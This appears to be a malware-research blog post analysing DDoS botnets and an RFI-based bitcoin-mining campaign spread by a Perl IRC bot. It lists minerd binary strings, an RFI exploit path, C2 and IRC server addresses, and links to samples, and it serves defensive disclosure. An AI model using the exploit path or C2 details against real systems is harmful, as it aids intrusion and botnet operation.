If you take a look at the www.digitalattackmap.com link-->(here) to view the current ongoing DDoS attack traffic to the USA and its sources (I snapshotted the map as shown below), you will see that the countries related to the sources of the attackers disclosed in this series of posts match; I marked them with red circles in the map below:
I have no doubt that these findings are actually disclosing groups of DDoS attacker "skids".

I must urge deeper investigation of the IRC channels and the individuals who are running this L7 DDoS show; the IDs are all there and it is not hard to infiltrate, so if you are familiar enough with IRC you can join our mission in visiting these servers to gain more intel that can go into cyber crime cases to teach these skids a lesson.

Samples are shared in this URL with the secure code-->>[Secure Code: 110369]

The compromised FTP information mentioned across Part 1 and 2 is announced below as FTP URLs, IP addresses, network information and GeoIP, for the purpose of asking your help to clean up these infections:


Case 8: The hack scheme for BitCoin Mining using Perl Bot RFI scanner

This case is an additional one, the last, from a report I received afterwards. The case is interesting so I decided to add it to this post's contents. It is about a hack attempt using many bots to spread BitCoin miners. The actor hacks webapp services vulnerable to RFI, injects the bots, installs the bitcoin mining servers and applications in the compromised system, and then uses the exploited system as a base to infect other services too.

The overall file list can be viewed in the snapshot above (the last one)-->>here, and the diagram below is the summary I made to explain the legend of the components spotted in this act:

The classification of the files above, "if" we want to see it by firing "file", is as per below:

But there are some misdetections too; for those, let's do a manual check.

How the hack scheme is working

Before jumping into details I will explain how the hack was done with the components above. The cycle of this hack attempt starts with scanning by the Perl IRC bot called "perlb0t" (too obvious a name..), scanning for RFI-vulnerable sites and attacking them to gain a foothold. When a shell is gained, they inject the site with the file "update" (or "c"), which contains the code below to download the installer "a" and execute it:

The installer runs the code below to prepare the evil installation, downloading the miners and bots and then running them without leaving any trace:

This is the initial setup made by the hacker after gaining this site, preparing some remote executable scripts to be downloaded from this site and installed on other machines, like the "bot" script in PHP below:

The ELF files are UPX packed, but "clamav" and "sh" are minerd, a known bitcoin miner daemon, as the strings show:

.rodata:0x06C318  Usage: minerd [OPTIONS]
.rodata:0x06C330  Options:
.rodata:0x06C339    -a, --algo=ALGO       specify the algorithm to use
.rodata:0x06C36E                            scrypt    scrypt(1024, 1, 1) (default)
.rodata:0x06C3AF                            sha256d   SHA-256d
.rodata:0x06C3DC    -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)
.rodata:0x06C42B    -O, --userpass=U:P    username:password pair for mining server
.rodata:0x06C46C    -u, --user=USERNAME   username for mining server
.rodata:0x06C49F    -p, --pass=PASSWORD   password for mining server
.rodata:0x06C4D2        --cert=FILE       certificate for mining server using SSL
.rodata:0x06C512    -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy
.rodata:0x06C552    -t, --threads=N       number of miner threads (default: number of processors)
.rodata:0x06C5A2    -r, --retries=N       number of times to retry if a network call fails
.rodata:0x06C5EB                            (default: retry indefinitely)
.rodata:0x06C623    -R, --retry-pause=N   time to pause between retries, in seconds (default: 30)
.rodata:0x06C673    -T, --timeout=N       network timeout, in seconds (default: 270)
.rodata:0x06C6B6    -s, --scantime=N      upper bound on time spent scanning current work when
.rodata:0x06C703                            long polling is unavailable, in seconds (default: 5)
.rodata:0x06C752        --no-longpoll     disable X-Long-Polling support
.rodata:0x06C789        --no-stratum      disable X-Stratum support
.rodata:0x06C7BB    -q, --quiet           disable per-thread hashmeter output
.rodata:0x06C7F7    -D, --debug           enable debug output
.rodata:0x06C823    -P, --protocol-dump   verbose dump of protocol-level activities
.rodata:0x06C865    -S, --syslog          use system log for output messages
.rodata:0x06C8A0    -B, --background      run the miner in the background
.rodata:0x06C8D8        --benchmark       run in offline benchmark mode
.rodata:0x06C90E    -c, --config=FILE     load a JSON-format configuration file
.rodata:0x06C94C    -V, --version         display version information and exit
.rodata:0x06C989    -h, --help            display this help text and exit
.rodata:0x06C9C8  accepted: %lu/%lu (%.2f%%), %s khash/s %s
.rodata:0x06C9F8  DEBUG: job_id=^%s^ extranonce2=%s ntime=%08x
.rodata:0x06CA28  Stratum connection interrupted
.rodata:0x06CA48  {^method^: ^getwork^, ^params^: [], ^id^:0}
.rodata:0x06CA78  DEBUG: stale work detected, discarding
.rodata:0x06CAA0  {^method^: ^mining.submit^, ^params^: [^%s^, ^%s^, ^%s^, ^%s^, ^%s^], ^id^:4}
.rodata:0x06CAF0  submit_upstream_work stratum_send_line failed
.rodata:0x06CB20  {^method^: ^getwork^, ^params^: [ ^%s^ ], ^id^:1}
And the WinPE files are all bitcoin mining applications; although some AVs flag these as "Not A Virus", I assure you that you never want these files to get into your system. VT report: [-1-] [-2-] [-3-]

Perl IRC/Bot "perlb0t"

This bot is nasty, and responsible for the RFI scanning and for exploiting vulnerable hosts so they can be used to install bitcoin mining. "lol" and "plm" are this bot's files. The highlights of this bot are pasted in the images snipped below.

The IRC connection (CNC):

The host's port scanner:
And this is how it scans for the RFI vulnerability:
As you can see, the path "/SQuery/lib/gore.php?libpath=" is aiming at the exploit shown in-->>here, with more reference in-->>here
There is an interesting function called "Spreader" which actually searches for a specific query of sites via the Google search engine; first they prepare domains in an array:

And execute the search via the Google API as per below:

And the HTTP query is formed here:

The other Perl bot (file: s0nia, php) called "Power Bot" is not that interesting at all and contains the basic bot features as usual: portscanner and basic HTTP flood attacks, with remote IRC connect, backconnect, and so on..; and the pbot (botphp file) found is the older version. So it is faster if you look at the shared sample directly.

The CNC of this case are as follows. All of the downloads are linked to an OVH IP address:

Req time: Wed Jun  4 22:50:59 JST 2014
UP: 176.31.255.138
Result: ns388807.ovh.net.|16276 | 176.31.0.0/16 | OVH | FR | OVH.COM | OVH SAS
And the IRCd used are listed below:
myircd.wha.la port: 3303 Nick: LINUX
oakleyharrod.mooo.com port: 3303 Nick: Bot
topsrv.us.to port: 3303 Nick Pma
topsrv.us.to port: 3303 Nick JSP
located in Turkey, Germany and France:
77.92.147.142|static-142-147-92-77.sadecehosting.net.|42910 | 77.92.147.0/24 | SADECEHOSTING | TR | SADECEHOSTING.COM | HOSTING INTERNET HIZMETLERI SANAYI VE TICARET ANONIM SIRKETI
85.214.70.175||6724 | 85.214.0.0/15 | STRATO | DE | STRATO.DE | STRATO AG
213.152.3.19|eleves.dev.advoo.fr.|8218 | 213.152.0.0/19 | NEO | FR | NEOTELECOMS.COM | NEO TELECOMS S.A.S.

The Case #8 samples can be downloaded here after you fill in the secure code-->>[Secure Code: 54349398].

And the VT links for these bot files are: [-1-] [-2-] [-3-] [-4-] [-5-]

Following the CNC network information gathered in this post's investigation leads us to the DDoS'er or Booter (or Stresser) services that are involved in using hacked FTP sites/accounts and utilizing the hacked servers for DDoS activity. The DDoS'er services proven to be connected to this hack attack are posted in the next report, together with some popular DDoS'er tools covered, in here -->>[MMD Next Blog]

It's been a long write-up; if you think it is useful and can help others, do not keep this information to yourself but spread it, as it is good to make more sysadmins aware of these details. Stay safe, folks!

#MalwareMustDie!